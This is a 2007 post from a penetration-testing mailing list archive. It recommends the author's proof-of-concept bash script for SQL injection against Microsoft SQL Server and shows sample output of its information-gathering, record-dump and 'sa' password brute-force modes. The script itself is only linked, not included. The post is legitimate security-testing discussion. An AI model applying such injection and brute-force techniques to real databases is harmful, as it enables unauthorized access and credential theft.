Penetration Testing mailing list archives
Re: Open Source SQL Inject, XSS, Remote File Include Testing
From: Marco Ivaldi <raptor () mediaservice net>
Date: Mon, 21 May 2007 13:45:41 +0200 (ora solare Europa occidentale)
On Sat, 19 May 2007, winsoc wrote:
> Can anyone recommend a quick and cheerful Open Source Tool which will test websites for SQL Injection, XSS, Remote File Include?
Speaking of SQL injection, just wanted to point out a bash script I put together while pen-testing some web applications that use MS SQL Server as back-end:

http://www.0xdeadbeef.info/code/mssql-hax0r

# Proof-of-concept multi-purpose SQL injection script for Microsoft SQL
# Server exploitation. Three operational modes are currently available:
# info (Information Gathering), dump (Record Dump), and brute (Brute
# Force). You may need to tweak the code a bit to make it fit your needs
# (i.e., modifying the injection string and/or the language used by the
# RDBMS).

You shouldn't expect anything too fancy (it's still v0.1 after all;), but it does its job:

root@shaolin:~# ./mssql-hax0r info tables
+++ DBFoobar
Accounting (id:390494850)
CanoneAnnuo (money)
CodiceFornitore (varchar)
dataInsert (datetime)
GroupId (char) *
GroupInsert (varchar)
idAccount (varchar)
idAnagrafica (int)
[...]

root@shaolin:~# ./mssql-hax0r dump
--------------------------------
SYSUSERS.uid=0
SYSUSERS.name=public
SYSUSERS.password=
--------------------------------
SYSUSERS.uid=1
SYSUSERS.name=dbo
SYSUSERS.password=
--------------------------------
SYSUSERS.uid=2
SYSUSERS.name=guest
SYSUSERS.password=
--------------------------------
3 record(s) dumped.

root@shaolin:~# ./mssql-hax0r brute xxx
Default (empty) password not valid, starting bruteforce.
aaa
bbb
ccc
password
Password of 'sa' user is 'password'!;)

Enjoy,

-- 
Marco Ivaldi, OPST
Chief Security Officer    Data Security Division
@ Mediaservice.net Srl    http://mediaservice.net/